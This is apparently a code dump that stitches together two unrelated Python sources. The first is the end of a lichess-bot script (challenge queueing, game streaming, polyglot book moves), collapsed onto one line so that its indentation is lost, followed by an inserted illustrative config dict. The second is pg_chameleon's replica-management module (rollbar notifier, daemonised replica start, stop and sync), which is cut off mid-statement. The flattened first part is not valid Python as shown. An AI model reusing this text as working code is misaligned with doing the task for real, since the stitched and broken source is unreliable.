watch_control_stream(control_queue, li): response = li.get_event_stream() try: for line in response.iter_lines(): if line: event = json.loads(line.decode('utf-8')) control_queue.put_nowait(event) else: control_queue.put_nowait({"type": "ping"}) except (RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as exception: logger.error("Terminating client due to connection error") traceback.print_exception(type(exception), exception, exception.__traceback__) control_queue.put_nowait({"type": "terminated"}) def start(li, user_profile, engine_factory, config): challenge_config = config["challenge"] max_games = challenge_config.get("concurrency", 1) logger.info("You're now connected to {} and awaiting challenges.".format(config["url"])) manager = multiprocessing.Manager() challenge_queue = manager.list() control_queue = manager.Queue() control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li]) control_stream.start() busy_processes = 0 queued_processes = 0 with logging_pool.LoggingPool(max_games+1) as pool: while not terminated: event = control_queue.get() if event["type"] == "terminated": break elif event["type"] == "local_game_done": busy_processes -= 1 logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes)) elif event["type"] == "challenge": chlng = model.Challenge(event["challenge"]) if chlng.is_supported(challenge_config): challenge_queue.append(chlng) if (challenge_config.get("sort_by", "best") == "best"): list_c = list(challenge_queue) list_c.sort(key=lambda c: -c.score()) challenge_queue = list_c else: try: li.decline_challenge(chlng.id) logger.info(" Decline {}".format(chlng)) except HTTPError as exception: if exception.response.status_code != 404: # ignore missing challenge raise exception elif event["type"] == "gameStart": if queued_processes <= 0: logger.debug("Something went wrong. Game is starting and we don't have a queued process") else: queued_processes -= 1 game_id = event["game"]["id"] pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue]) busy_processes += 1 logger.info("--- Process Used. Total Queued: {}. 
Total Used: {}".format(queued_processes, busy_processes)) while ((queued_processes + busy_processes) < max_games and challenge_queue): # keep processing the queue until empty or max_games is reached chlng = challenge_queue.pop(0) try: response = li.accept_challenge(chlng.id) logger.info(" Accept {}".format(chlng)) queued_processes += 1 logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes)) except HTTPError as exception: if exception.response.status_code == 404: # ignore missing challenge logger.info(" Skip missing {}".format(chlng)) else: raise exception logger.info("Terminated") control_stream.terminate() control_stream.join() @backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final) def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue): response = li.get_game_stream(game_id) lines = response.iter_lines() #Initial response of stream will be the full game info. Store it game = model.Game(json.loads(next(lines).decode('utf-8')), user_profile["username"], li.baseUrl, config.get("abort_time", 20)) board = setup_board(game) engine = engine_factory(board) conversation = Conversation(game, engine, li, __version__, challenge_queue) logger.info("+++ {}".format(game)) engine_cfg = config["engine"] polyglot_cfg = engine_cfg.get("polyglot", {}) book_cfg = polyglot_cfg.get("book", {}) try: if not polyglot_cfg.get("enabled") or not play_first_book_move(game, engine, board, li, book_cfg): play_first_move(game, engine, board, li) engine.set_time_control(game) for binary_chunk in lines: upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None u_type = upd["type"] if upd else "ping" if u_type == "chatLine": conversation.react(ChatLine(upd), game) elif u_type == "gameState": game.state = upd moves = upd["moves"].split() board = update_board(board, moves[-1]) if not board.is_game_over() and is_engine_move(game, moves): if config.get("fake_think_time") and len(moves) > 9: delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015 accel = 1 - max(0, min(100, len(moves) - 20)) / 150 sleep = min(5, delay * accel) time.sleep(sleep) best_move = None if polyglot_cfg.get("enabled") and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1: best_move = get_book_move(board, book_cfg) if best_move == None: best_move = engine.search(board, upd["wtime"], upd["btime"], upd["winc"], upd["binc"]) li.make_move(game.id, best_move) game.abort_in(config.get("abort_time", 20)) elif u_type == "ping": if game.should_abort_now(): logger.info(" Aborting {} by lack of activity".format(game.url())) li.abort(game.id) except HTTPError as e: ongoing_games = li.get_ongoing_games() game_over = True for ongoing_game in ongoing_games: if ongoing_game["gameId"] == game.id: game_over = False break if not game_over: logger.warn("Abandoning game due to HTTP "+response.status_code) except (RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as exception: logger.error("Abandoning game due to connection error") traceback.print_exception(type(exception), exception, exception.__traceback__) finally: logger.info("--- {} Game over".format(game.url())) engine.quit() # This can raise queue.NoFull, but that should only happen if we're not processing # events fast enough and in this case I believe the exception should be raised control_queue.put_nowait({"type": "local_game_done"}) def play_first_move(game, engine, board, li): moves = game.state["moves"].split() if is_engine_move(game, 
moves): # need to hardcode first movetime since Lichess has 30 sec limit. best_move = engine.first_search(board, 10000) li.make_move(game.id, best_move) return True return False def play_first_book_move(game, engine, board, li, config): moves = game.state["moves"].split() if is_engine_move(game, moves): book_move = get_book_move(board, config) if book_move: li.make_move(game.id, book_move) return True else: return play_first_move(game, engine, board, li) return False def get_book_move(board, config): if board.uci_variant == "chess": book = config["standard"] else: if config.get("{}".format(board.uci_variant)): book = config["{}".format(board.uci_variant)] else: return None with chess.polyglot.open_reader(book) as reader: try: selection = config.get("selection", "weighted_random") if selection == "weighted_random": move = reader.weighted_choice(board).move() elif selection == "uniform_random": move = reader.choice(board, config.get("min_weight", 1)).move() elif selection == "best_move": move = reader.find(board, config.get("min_weight", 1)).move() except IndexError: # python-chess raises "IndexError" if no entries found move = None if move is not None: logger.info("Got move {} from book {}".format(move, book)) return move def setup_board(game): if game.variant_name.lower() == "chess960": board = chess.Board(game.initial_fen, chess960=True) elif game.variant_name == "From Position": board = chess.Board(game.initial_fen) else: VariantBoard = find_variant(game.variant_name) board = VariantBoard() moves = game.state["moves"].split() for move in moves: board = update_board(board, move) return board def is_white_to_move(game, moves): return len(moves) % 2 == (0 if game.white_starts else 1) def is_engine_move(game, moves): return game.is_white == is_white_to_move(game, moves) def update_board(board, move): uci_move = chess.Move.from_uci(move) board.push(uci_move) return board def intro(): return r""" . _/| . // o\ . || ._) lichess-bot %s . //__\ . )___( Play on Lichess with a bot """ % __version__ if __name__ == "__main__": parser = argparse.ArgumentParser(description='Play on Lichess with a bot') parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.') parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.') parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)') parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None) args = parser.parse_args() logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile, format="%(asctime)-15s: %(message)s") enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO) logger.info(intro()) CONFIG = load_config(args.config or "./config.yml") li = lichess.Lichess(CONFIG["token"], CONFIG["url"], __version__) user_profile = li.get_profile() username = user_profile["username"] is_bot = user_profile.get("title") == "BOT" logger.info("Welcome {}!".format(username)) if args.u is True and is_bot is False: is_bot = upgrade_account(li) if is_bot: engine_factory = partial(engine_wrapper.create_engine, CONFIG) start(li, user_profile, engine_factory, CONFIG) else: logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
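# Illustrative sketch (not part of lichess-bot.py): the configuration keys the script
# reads from config.yml, shown as a Python dict so the example stays in one language.
# Only keys actually referenced above are listed; all values are placeholders.
EXAMPLE_CONFIG = {
    "token": "xxxxxxxxxxxx",                 # Lichess API token (placeholder)
    "url": "https://lichess.org/",
    "abort_time": 20,                        # seconds of inactivity before aborting
    "fake_think_time": False,
    "challenge": {"concurrency": 1, "sort_by": "best"},
    "engine": {"polyglot": {"enabled": False}},
}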
global_lib.py
import rollbar
import pprint
import yaml
import os, os.path
import sys
import time
import signal
from shutil import copy
from distutils.sysconfig import get_python_lib
from tabulate import tabulate
from pg_chameleon import pg_engine, mysql_source, pgsql_source
import logging
from logging.handlers import TimedRotatingFileHandler
from daemonize import Daemonize
import multiprocessing as mp
import traceback
from pkg_resources import get_distribution


class rollbar_notifier(object):
    """
        This class is used to send messages to rollbar when the key and environment variables are set.
    """
    def __init__(self, rollbar_key, rollbar_env, rollbar_level, logger):
        """
            Class constructor.
        """
        self.levels = {
            "critical": 1,
            "error": 2,
            "warning": 3,
            "info": 5
        }
        self.rollbar_level = self.levels[rollbar_level]
        self.logger = logger
        self.notifier = rollbar
        if rollbar_key != '' and rollbar_env != '':
            self.notifier.init(rollbar_key, rollbar_env)
        else:
            self.notifier = None

    def send_message(self, message, level):
        """
            The method sends a message to rollbar. If it fails it just logs an error
            without causing the process to crash.
        """
        if self.notifier:
            exc_info = sys.exc_info()
            try:
                notification_level = self.levels[level]
                if notification_level <= self.rollbar_level:
                    try:
                        self.notifier.report_message(message, level)
                        if exc_info[0]:
                            self.notifier.report_exc_info(exc_info)
                    except:
                        self.logger.error("Could not send the message to rollbar.")
            except:
                self.logger.error("Wrong rollbar level specified.")


class replica_engine(object):
    """
        This class wraps the mysql and postgresql engines in order to perform the
        various activities required for the replica. The constructor inits the
        global configuration class and sets up the mysql and postgresql engines
        as class objects. The class sets the logging using the configuration
        parameter.
    """
    def __init__(self, args):
        """
            Class constructor.
""" if os.geteuid()==0: print ("pg_chameleon cannot be run as root") sys.exit(10) self.catalog_version = '2.0.9' self.upgradable_version = '1.7' self.lst_yes= ['yes', 'Yes', 'y', 'Y'] python_lib=os.path.dirname(os.path.realpath(__file__)) cham_dir = "%s/.pg_chameleon" % os.path.expanduser('~') local_conf = "%s/configuration/" % cham_dir self.global_conf_example = '%s/../configuration/config-example.yml' % python_lib self.local_conf_example = '%s/config-example.yml' % local_conf local_logs = "%s/logs/" % cham_dir local_pid = "%s/pid/" % cham_dir self.conf_dirs=[ cham_dir, local_conf, local_logs, local_pid, ] self.args = args self.source = self.args.source if self.args.command == 'set_configuration_files': self.set_configuration_files() sys.exit() self.__set_conf_permissions(cham_dir) self.load_config() log_list = self.__init_logger("global") self.logger = log_list[0] self.logger_fds = log_list[1] #notifier configuration self.notifier = rollbar_notifier(self.config["rollbar_key"],self.config["rollbar_env"] , self.args.rollbar_level , self.logger ) #pg_engine instance initialisation self.pg_engine = pg_engine() self.pg_engine.dest_conn = self.config["pg_conn"] self.pg_engine.logger = self.logger self.pg_engine.source = self.args.source self.pg_engine.full = self.args.full self.pg_engine.type_override = self.config["type_override"] self.pg_engine.sources = self.config["sources"] self.pg_engine.notifier = self.notifier #mysql_source instance initialisation self.mysql_source = mysql_source() self.mysql_source.source = self.args.source self.mysql_source.tables = self.args.tables self.mysql_source.schema = self.args.schema.strip() self.mysql_source.pg_engine = self.pg_engine self.mysql_source.logger = self.logger self.mysql_source.sources = self.config["sources"] self.mysql_source.type_override = self.config["type_override"] self.mysql_source.notifier = self.notifier #pgsql_source instance initialisation self.pgsql_source = pgsql_source() self.pgsql_source.source = self.args.source self.pgsql_source.tables = self.args.tables self.pgsql_source.schema = self.args.schema.strip() self.pgsql_source.pg_engine = self.pg_engine self.pgsql_source.logger = self.logger self.pgsql_source.sources = self.config["sources"] self.pgsql_source.type_override = self.config["type_override"] self.pgsql_source.notifier = self.notifier catalog_version = self.pg_engine.get_catalog_version() #safety checks if self.args.command == 'upgrade_replica_schema': self.pg_engine.sources = self.config["sources"] print("WARNING, entering upgrade mode. Disabling the catalogue version's check. Expected version %s, installed version %s" % (self.catalog_version, catalog_version)) elif self.args.command == 'enable_replica' and self.catalog_version != catalog_version: print("WARNING, catalogue mismatch. Expected version %s, installed version %s" % (self.catalog_version, catalog_version)) else: if catalog_version: if self.catalog_version != catalog_version: print("FATAL, replica catalogue version mismatch. Expected %s, got %s" % (self.catalog_version, catalog_version)) sys.exit() if self.args.source != '*' and self.args.command != 'add_source': self.pg_engine.connect_db() source_count = self.pg_engine.check_source() self.pg_engine.disconnect_db() if source_count == 0: print("FATAL, The source %s is not registered. Please add it add_source" % (self.args.source)) sys.exit() def terminate_replica(self, signal, frame): """ Stops gracefully the replica. 
""" self.logger.info("Caught stop replica signal terminating daemons and ending the replica process.") self.read_daemon.terminate() self.replay_daemon.terminate() self.pg_engine.connect_db() self.pg_engine.set_source_status("stopped") sys.exit(0) def set_configuration_files(self): """ The method loops the list self.conf_dirs creating them only if they are missing. The method checks the freshness of the config-example.yaml and connection-example.yml copies the new version from the python library determined in the class constructor with get_python_lib(). If the configuration file is missing the method copies the file with a different message. """ for confdir in self.conf_dirs: if not os.path.isdir(confdir): print ("creating directory %s" % confdir) os.mkdir(confdir) if os.path.isfile(self.local_conf_example): if os.path.getctime(self.global_conf_example)>os.path.getctime(self.local_conf_example): print ("updating configuration example with %s" % self.local_conf_example) copy(self.global_conf_example, self.local_conf_example) else: print ("copying configuration example in %s" % self.local_conf_example) copy(self.global_conf_example, self.local_conf_example) def load_config(self): """ The method loads the configuration from the file specified in the args.config parameter. """ local_confdir = "%s/.pg_chameleon/configuration/" % os.path.expanduser('~') self.config_file = '%s/%s.yml'%(local_confdir, self.args.config) if not os.path.isfile(self.config_file): print("**FATAL - configuration file missing. Please ensure the file %s is present." % (self.config_file)) sys.exit() config_file = open(self.config_file, 'r') pyyml=str(get_distribution('PyYAML')).split(' ')[1] if pyyml<='3.13': self.config = yaml.load(config_file.read()) else: self.config = yaml.load(config_file.read(), Loader=yaml.FullLoader) config_file.close() def show_sources(self): """ The method shows the sources available in the configuration file. """ for item in self.config["sources"]: print("\n") print (tabulate([], headers=["Source %s" % item])) tab_headers = ['Parameter', 'Value'] tab_body = [] source = self.config["sources"][item] config_list = [param for param in source if param not in ['db_conn']] connection_list = [param for param in source["db_conn"] if param not in ['password']] for parameter in config_list: tab_row = [parameter, source[parameter]] tab_body.append(tab_row) for param in connection_list: tab_row = [param, source["db_conn"][param]] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers)) def show_config(self): """ The method loads the current configuration and displays the status in tabular output """ config_list = [item for item in self.config if item not in ['pg_conn', 'sources', 'type_override']] connection_list = [item for item in self.config["pg_conn"] if item not in ['password']] type_override = pprint.pformat(self.config['type_override'], width = 20) tab_body = [] tab_headers = ['Parameter', 'Value'] for item in config_list: tab_row = [item, self.config[item]] tab_body.append(tab_row) for item in connection_list: tab_row = [item, self.config["pg_conn"][item]] tab_body.append(tab_row) tab_row = ['type_override', type_override] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers)) self.show_sources() def create_replica_schema(self): """ The method creates the replica schema in the destination database. 
""" self.logger.info("Trying to create replica schema") self.pg_engine.create_replica_schema() def drop_replica_schema(self): """ The method removes the replica schema from the destination database. """ self.logger.info("Dropping the replica schema") self.pg_engine.drop_replica_schema() def add_source(self): """ The method adds a new replication source. A pre existence check is performed """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: self.logger.info("Trying to add a new source") self.pg_engine.add_source() def drop_source(self): """ The method removes a replication source from the catalogue. """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: drp_msg = 'Dropping the source %s will remove drop any replica reference.\n Are you sure? YES/No\n' % self.args.source drop_src = input(drp_msg) if drop_src == 'YES': self.logger.info("Trying to remove the source") self.pg_engine.drop_source() elif drop_src in self.lst_yes: print('Please type YES all uppercase to confirm') def enable_replica(self): """ The method resets the source status to stopped and disables any leftover maintenance mode """ self.pg_engine.connect_db() self.pg_engine.set_source_status("stopped") self.pg_engine.end_maintenance() def copy_schema(self): """ The method calls init_replica adding a flag for skipping the data copy. Useful if we want to test for schema issues or to populate the schema preventively. """ self.mysql_source.copy_table_data=False self.init_replica() self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata() self.pg_engine.create_foreign_keys() def init_replica(self): """ The method initialise a replica for a given source and configuration. It is compulsory to specify a source name when running this method. The method checks the source type and calls the corresponding initialisation's method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") elif self.args.tables != "*": print("You cannot specify a table name when running init_replica.") else: try: source_type = self.config["sources"][self.args.source]["type"] except KeyError: print("The source %s doesn't exists." % (self.args.source)) sys.exit() self.__stop_replica() if source_type == "mysql": self.__init_mysql_replica() elif source_type == "pgsql": self.__init_pgsql_replica() def __init_mysql_replica(self): """ The method initialise a replica for a given mysql source within the specified configuration. The method is called by the public method init_replica. """ if self.args.debug: self.mysql_source.init_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("Initialising the replica for source %s" % self.args.source) init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.mysql_source.init_replica, foreground=foreground , keep_fds=keep_fds) init_daemon.start() def __init_pgsql_replica(self): """ The method initialise a replica for a given postgresql source within the specified configuration. The method is called by the public method init_replica. """ if self.args.debug: self.pgsql_source.init_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Process for source %s started." 
% (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("Initialising the replica for source %s" % self.args.source) init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.pgsql_source.init_replica, foreground=foreground , keep_fds=keep_fds) init_daemon.start() def refresh_schema(self): """ The method reload the data from a source and only for a specified schema. Is compulsory to specify a source name and an origin's schema name. The schema mappings are honoured by the procedure automatically. """ if self.args.source == "*": print("You must specify a source name using the argument --source") elif self.args.schema == "*": print("You must specify an origin's schema name using the argument --schema") else: self.__stop_replica() if self.args.debug: self.mysql_source.refresh_schema() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Sync tables process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source)) sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.refresh_schema, foreground=foreground , keep_fds=keep_fds) sync_daemon .start() def sync_tables(self): """ The method reload the data from a source only for specified tables. Is compulsory to specify a source name and at least one table name when running this method. Multiple tables are allowed if comma separated. """ if self.args.source == "*": print("You must specify a source name using the argument --source") elif self.args.tables == "*": print("You must specify one or more tables, in the form schema.table, separated by comma using the argument --tables") else: self.__stop_replica() if self.args.debug: self.mysql_source.sync_tables() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Sync tables process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source)) sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.sync_tables, foreground=foreground , keep_fds=keep_fds) sync_daemon .start() def __stop_all_active_sources(self): """ The method stops all the active sources within the target PostgreSQL database. """ active_source = self.pg_engine.get_active_sources() for source in active_source: self.source = source[0] self.__stop_replica() def upgrade_replica_schema(self): """ The method upgrades an existing replica catalogue to the newer version. If the catalogue is from the previous version """ catalog_version = self.pg_engine.get_catalog_version() if catalog_version == self.catalog_version: print("The replica catalogue is already up to date.") sys.exit() else: if catalog_version == self.upgradable_version: upg_msg = 'Upgrading the catalogue %s to the version %s.\n Are you sure? 
YES/No\n' % (catalog_version, self.catalog_version) upg_cat = input(upg_msg) if upg_cat == 'YES': self.logger.info("Performing the upgrade") self.pg_engine.upgrade_catalogue_v1() elif upg_cat in self.lst_yes: print('Please type YES all uppercase to confirm') elif catalog_version.split('.')[0] == '2' and catalog_version.split('.')[1] == '0': print('Stopping all the active sources.') self.__stop_all_active_sources() print('Upgrading the replica catalogue. ') self.pg_engine.upgrade_catalogue_v20() else: print('Wrong starting version. Expected %s, got %s' % (catalog_version, self.upgradable_version)) sys.exit() def update_schema_mappings(self): """ The method updates the schema mappings for the given source. The schema mappings is a configuration parameter but is stored in the replica catalogue when the source is added. If any change is made on the configuration file this method should be called to update the system catalogue as well. The pg_engine method checks for any conflict before running the update on the tables t_sources and t_replica_tables. Is compulsory to specify a source name when running this method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: self.__stop_replica() self.pg_engine.update_schema_mappings() def read_replica(self, queue, log_read): """ The method reads the replica stream for the given source and stores the row images in the target postgresql database. """ if "keep_existing_schema" in self.config["sources"][self.args.source]: keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"] else: keep_existing_schema = False self.mysql_source.keep_existing_schema = keep_existing_schema self.mysql_source.logger = log_read[0] self.pg_engine.logger = log_read[0] while True: try: self.mysql_source.read_replica() time.sleep(self.sleep_loop) except Exception: queue.put(traceback.format_exc()) break def replay_replica(self, queue, log_replay): """ The method replays the row images stored in the target postgresql database. """ self.pg_engine.logger = log_replay[0] tables_error = [] self.pg_engine.connect_db() self.pg_engine.set_source_id() while True: try: tables_error = self.pg_engine.replay_replica() if len(tables_error) > 0: table_list = [item for sublist in tables_error for item in sublist] tables_removed = "\n".join(table_list) notifier_message = "There was an error during the replay of data. %s. The affected tables are no longer replicated." % (tables_removed) self.logger.error(notifier_message) self.notifier.send_message(notifier_message, 'error') except Exception: queue.put(traceback.format_exc()) break time.sleep(self.sleep_loop) def __run_replica(self): """ This method is the method which manages the two separate processes using the multiprocess library. It can be daemonised or run in foreground according with the --debug configuration or the log destination. 
""" if "auto_maintenance" not in self.config["sources"][self.args.source]: auto_maintenance = "disabled" else: auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"] if "gtid_enable" not in self.config["sources"][self.args.source]: gtid_enable = False else: gtid_enable = self.config["sources"][self.args.source]["gtid_enable"] self.mysql_source.gtid_enable = gtid_enable log_read = self.__init_logger("read") log_replay = self.__init_logger("replay") signal.signal(signal.SIGINT, self.terminate_replica) queue = mp.Queue() self.sleep_loop = self.config["sources"][self.args.source]["sleep_loop"] if self.args.debug: check_timeout = self.sleep_loop else: check_timeout = self.sleep_loop*10 self.logger.info("Starting the replica daemons for source %s " % (self.args.source)) self.read_daemon = mp.Process(target=self.read_replica, name='read_replica', daemon=True, args=(queue, log_read,)) self.replay_daemon = mp.Process(target=self.replay_replica, name='replay_replica', daemon=True, args=(queue, log_replay,)) self.read_daemon.start() self.replay_daemon.start() while True: read_alive = self.read_daemon.is_alive() replay_alive = self.replay_daemon.is_alive() if read_alive and replay_alive: self.logger.debug("Replica process for source %s is running" % (self.args.source)) self.pg_engine.cleanup_replayed_batches() else: stack_trace = queue.get() self.logger.error("Read process alive: %s - Replay process alive: %s" % (read_alive, replay_alive, )) self.logger.error("Stack trace: %s" % (stack_trace, )) if read_alive: self.read_daemon.terminate() self.logger.error("Replay daemon crashed. Terminating the read daemon.") if replay_alive: self.replay_daemon.terminate() self.logger.error("Read daemon crashed. Terminating the replay daemon.") if self.args.debug: replica_status = "stopped" else: replica_status = "error" try: self.pg_engine.connect_db() self.pg_engine.set_source_status(replica_status) except: pass notifier_message = "The replica process crashed.\n Source: %s\n Stack trace: %s " %(self.args.source, stack_trace) self.notifier.send_message(notifier_message, 'critical') break time.sleep(check_timeout) if auto_maintenance != "disabled": self.pg_engine.auto_maintenance = auto_maintenance self.pg_engine.connect_db() run_maintenance = self.pg_engine.check_auto_maintenance() self.pg_engine.disconnect_db() if run_maintenance: self.pg_engine.run_maintenance() self.logger.info("Replica process for source %s ended" % (self.args.source)) def start_replica(self): """ The method starts a new replica process. Is compulsory to specify a source name when running this method. """ replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) if self.args.source == "*": print("You must specify a source name using the argument --source") else: self.pg_engine.connect_db() self.logger.info("Checking if the replica for source %s is stopped " % (self.args.source)) replica_status = self.pg_engine.get_replica_status() if replica_status in ['syncing', 'running', 'initialising']: print("The replica process is already started or is syncing. Aborting the command.") elif replica_status == 'error': print("The replica process is in error state.") print("You may need to check the replica status first. 
To enable it run the following command.") print("chameleon.py enable_replica --config %s --source %s " % (self.args.config, self.args.source)) else: self.logger.info("Cleaning not processed batches for source %s" % (self.args.source)) self.pg_engine.clean_not_processed_batches() self.pg_engine.disconnect_db() if self.args.debug: self.__run_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Starting the replica process for source %s" % (self.args.source)) keep_fds = [self.logger_fds] app_name = "%s_replica" % self.args.source replica_daemon = Daemonize(app=app_name, pid=replica_pid, action=self.__run_replica, foreground=foreground , keep_fds=keep_fds) try: replica_daemon.start() except: print("The replica process is already started. Aborting the command.") def __stop_replica(self): """ The method reads the pid of the replica process for the given self.source and sends a SIGINT which tells the replica process to manage a graceful exit. """ replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.source)) if os.path.isfile(replica_pid): try: file_pid=open(replica_pid,'r') pid=file_pid.read() file_pid.close() os.kill(int(pid),2) print("Requesting the replica for source %s to stop" % (self.source)) while True: try: os.kill(int(pid),0) except: break print("The replica process is stopped") except: print("An error occurred when trying to signal the replica process") def __set_conf_permissions(self, cham_dir): """ The method sets the permissions of the configuration directory to 700 :param cham_dir: the chameleon configuration directory to fix """ if os.path.isdir(cham_dir): os.chmod(cham_dir, 0o700) def stop_replica(self): """ The method calls the private method __stop_replica to stop the replica process. """ self.__stop_replica() def stop_all_replicas(self): """ The method stops all the active replicas within the target database """ self.__stop_all_active_sources() def show_errors(self): """ displays the error log entries if any. If the source the error log is filtered for this source only. """ log_id = self.args.logid self.pg_engine.source = self.args.source log_error_data = self.pg_engine.get_log_data(log_id) if log_error_data: if log_id != "*": tab_body = [] log_line = log_error_data[0] tab_body.append(['Log id', log_line[0]]) tab_body.append(['Source name', log_line[1]]) tab_body.append(['ID Batch', log_line[2]]) tab_body.append(['Table', log_line[3]]) tab_body.append(['Schema', log_line[4]]) tab_body.append(['Error timestamp', log_line[5]]) tab_body.append(['SQL executed', log_line[6]]) tab_body.append(['Error message', log_line[7]]) print(tabulate(tab_body, tablefmt="simple")) else: tab_headers = ['Log id', 'Source name', 'ID Batch', 'Table', 'Schema' , 'Error timestamp'] tab_body = [] for log_line in log_error_data: log_id = log_line[0] id_batch = log_line[1] source_name = log_line[2] table_name = log_line[3] schema_name = log_line[4] error_timestamp = log_line[5] tab_row = [log_id, id_batch,source_name, table_name, schema_name, error_timestamp] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) else: print('There are no errors in the log') def show_status(self): """ list the replica status from the replica catalogue. If the source is specified gives some extra details on the source status. 
""" self.pg_engine.auto_maintenance = "disabled" if self.args.source != "*": if "auto_maintenance" in self.config["sources"][self.args.source]: self.pg_engine.auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"] self.pg_engine.source = self.args.source configuration_data = self.pg_engine.get_status() configuration_status = configuration_data[0] schema_mappings = configuration_data[1] table_status = configuration_data[2] replica_counters = configuration_data[3] tab_headers = ['Source id', 'Source name', 'Type', 'Status', 'Consistent' , 'Read lag', 'Last read', 'Replay lag' , 'Last replay'] tab_body = [] for status in configuration_status: source_id = status[0] source_name = status[1] source_status = status[2] read_lag = status[3] last_read = status[4] replay_lag = status[5] last_replay = status[6] consistent = status[7] source_type = status[8] last_maintenance = status[9] next_maintenance = status[10] tab_row = [source_id, source_name, source_type, source_status, consistent, read_lag, last_read, replay_lag, last_replay] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) if schema_mappings: print('\n== Schema mappings ==') tab_headers = ['Origin schema', 'Destination schema'] tab_body = [] for mapping in schema_mappings: origin_schema = mapping[0] destination_schema= mapping[1] tab_row = [origin_schema, destination_schema] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) if table_status: print('\n== Replica status ==') #tab_headers = ['', '', ''] tab_body = [] tables_no_replica = table_status[0] tab_row = ['Tables not replicated', tables_no_replica[1]] tab_body.append(tab_row) tables_with_replica = table_status[1] tab_row = ['Tables replicated', tables_with_replica[1]] tab_body.append(tab_row) tables_all= table_status[2] tab_row = ['All tables', tables_all[1]] tab_body.append(tab_row) tab_row = ['Last maintenance', last_maintenance] tab_body.append(tab_row) tab_row = ['Next maintenance', next_maintenance] tab_body.append(tab_row) if replica_counters: tab_row = ['Replayed rows', replica_counters[0]] tab_body.append(tab_row) tab_row = ['Replayed DDL', replica_counters[2]] tab_body.append(tab_row) tab_row = ['Skipped rows', replica_counters[1]] tab_body.append(tab_row) print(tabulate(tab_body, tablefmt="simple")) if tables_no_replica[2]: print('\n== Tables with replica disabled ==') print("\n".join(tables_no_replica[2])) def detach_replica(self): """ The method terminates the replica process. The source is removed from the table t_sources with all the associated data. The schema sequences in are reset to the max values in the corresponding tables, leaving the postgresql database as a standalone snapshot. The method creates the foreign keys existing in MySQL as well. Is compulsory to specify a source name when running this method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") elif self.args.tables != "*": print("You cannot specify a table name when running detach_replica.") else: drp_msg = 'Detaching the replica will remove any reference for the source %s.\n Are you sure? 
YES/No\n' % self.args.source drop_src = input(drp_msg) if drop_src == 'YES': if "keep_existing_schema" in self.config["sources"][self.args.source]: keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"] else: keep_existing_schema = False self.pg_engine.keep_existing_schema = keep_existing_schema if not keep_existing_schema: self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata() self.__stop_replica() self.pg_engine.detach_replica() elif drop_src in self.lst_yes: print('Please type YES all uppercase to confirm') def run_maintenance(self): """ The method runs a maintenance process on the target postgresql database specified in the given source. """ maintenance_pid = os.path.expanduser('%s/%s_maintenance.pid' % (self.config["pid_dir"],self.args.source)) if self.args.source == "*": print("You must specify a source name with the argument --source") else: if self.args.debug: self.pg_engine.run_maintenance() else: if self.config["log_dest"] == 'stdout': foreground = True else: self.logger.info("Starting the maintenance on the source %s" % (self.args.source, )) foreground = False print("Starting the maintenance process for source %s" % (self.args.source)) keep_fds = [self.logger_fds] app_name = "%s_maintenance" % self.args.source maintenance_daemon 